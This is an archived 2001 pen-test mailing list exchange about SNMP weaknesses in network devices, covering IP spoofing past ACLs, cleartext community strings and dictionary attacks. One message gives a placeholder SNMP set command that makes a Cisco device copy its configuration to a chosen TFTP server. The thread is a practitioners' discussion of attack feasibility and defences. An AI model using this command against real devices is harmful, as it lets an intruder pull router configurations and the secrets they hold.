But in order to spoof the source IP address an attacker would need to know which source IP address would make it through the ACL... And an attacker would also have to determine by an external scan that a particular target is susceptible to SNMP attacks BEFORE trying to get through the ACL. And you are 100% correct on the SNMP being sent in clear-text. Anyone have any info on how SNMPv2 could provide a more secure SNMP environment? And if there is an unauthorized sniffer in your environment then all bets are off. Ron Russell - MCSE, CCNA, CNE 480-6-Buddha Silicon Buddha LLC Enlightened Network Services www.siliconbuddha.com Offering Free Vulnerability Assessments from the deserts of Phoenix Arizona ----- Original Message ----- From: "woody weaver" <woody.weaverat_private> To: "'Ron Russell'" <ronat_private> Cc: <pen-testat_private> Sent: Monday, July 16, 2001 4:50 PM Subject: RE: snmp vulnerablities -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Monday, July 16, 2001 3:01 PM, Ron Russell wrote: [...] > And the activity could have been prevented by proper use of > ACLs, This is not an easy task. Because UDP is stateless, spoofing is fairly trivial. Particularly for the snmp set approach you mention - -- the format is $SNMPSET $TARGET $COMMUNITY .1.3.6.1.4.1.9.2.1.55.$MYIP s $CONFIG where $MYIP is the IP address of the tftp server. Consequently, one can spoof the snmp set as coming from that trusted host -- the ACL has to reach into the data portion of the packet to prevent the tftp occurring. Its not clear to me where the original penetration test was coming from, but if it was from a portion of the network where detecting spoofed addresses is not easy, then you have few options. > and the > proper configuration of SNMP (not using easily guessable > strings). I'm not sure this is especially helpful; SNMP is sent in the clear, of course, so the strings can be observed in transit, the game is up. Also, dictionary attacks are straightforward, since logging of snmp traffic seems to be rarely done. [...] - --woody -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com> iQA/AwUBO1N9xaWr4+fi694gEQL8gwCgg5Q7huPhA+yCUuwFjAkTHcxJ/fAAoKVb RweCZ7evjZ29a+RgvtPB2m1r =cqIf -----END PGP SIGNATURE----- ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/ ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Tue Jul 17 2001 - 15:02:08 PDT